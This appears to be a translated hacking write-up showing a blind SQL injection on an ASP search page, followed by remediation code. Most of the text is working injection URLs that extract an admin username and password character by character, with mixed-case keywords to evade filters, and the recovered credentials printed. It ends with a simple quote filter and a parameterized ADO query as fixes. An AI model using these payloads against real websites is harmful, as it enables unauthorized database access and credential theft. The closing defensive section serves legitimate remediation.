http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'='
The first character of the username is m.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'='
The second character of the username is a.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'='
The third character of the username is r.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'='
The fourth character of the username is s.
So the username is mars.

The password length is 8.
http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'='
The first character of the password is 1.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'='
The second character of the password is 2.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'='
The third character of the password is 3.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'='
The fourth character of the password is 4.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'='
The fifth character of the password is q.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'='
The sixth character of the password is w.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'='
The seventh character of the password is q.

http://www.xxx.com/s.asp?k=1%25' AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'='
The eighth character of the password is w.
So the password is 1234qwqw.
How to fix the vulnerability: just filter out the ' character.
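k=request.QueryString("k")
' Reject the request if the search keyword contains a single quote
if instr(k,"'")>0 then
    response.Write "<script>alert('error');window.close();</script>"
    response.End()
end if
' Fall back to page 1 when the page parameter is missing or not numeric
page=request.QueryString("page")
if page="" or isnumeric(page)=0 then
    g_cur_page=1
else
    g_cur_page=cint(page)
end if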
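
A parameterized version of the same search, as an added example that is not part of the original post: k is bound as a query parameter instead of being concatenated into the SQL, so the fix does not depend on filtering the quote character. It assumes an Access (Jet) backend, which the AsC/MID/ToP syntax in the requests above suggests; the database path, the table "article" and its columns id and title are hypothetical names.

```vbscript
<%
' Added example: parameterized search for s.asp (not the original site's code).
' Assumed, hypothetical names: data/site.mdb, table "article", columns id/title.
Const adVarWChar = 202, adParamInput = 1, adCmdText = 1
Const MAX_K_LEN = 50

Dim k, page, g_cur_page, re, conn, cmd, rs

k = Trim(Request.QueryString("k"))
If Len(k) = 0 Or Len(k) > MAX_K_LEN Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Escape the LIKE wildcards ([, % and _ under ADO/Jet) so the keyword only matches literally.
k = Replace(k, "[", "[[]")
k = Replace(k, "%", "[%]")
k = Replace(k, "_", "[_]")

' Accept only 1-4 digits for page; CInt raises an overflow error on larger values.
Set re = New RegExp
re.Pattern = "^\d{1,4}$"
page = Request.QueryString("page")
If re.Test(page) Then g_cur_page = CInt(page) Else g_cur_page = 1
If g_cur_page < 1 Then g_cur_page = 1

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("data/site.mdb")

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' The ? placeholder is bound as data, so quotes and SQL keywords in k are never parsed as SQL.
cmd.CommandText = "SELECT id, title FROM article WHERE title LIKE ?"
cmd.Parameters.Append cmd.CreateParameter("k", adVarWChar, adParamInput, 255, "%" & k & "%")
Set rs = cmd.Execute

Do Until rs.EOF
    ' HTML-encode on output so markup stored in the table is not rendered by the browser.
    Response.Write Server.HTMLEncode(rs("title") & "") & "<br>"
    rs.MoveNext
Loop

rs.Close
conn.Close
%>
```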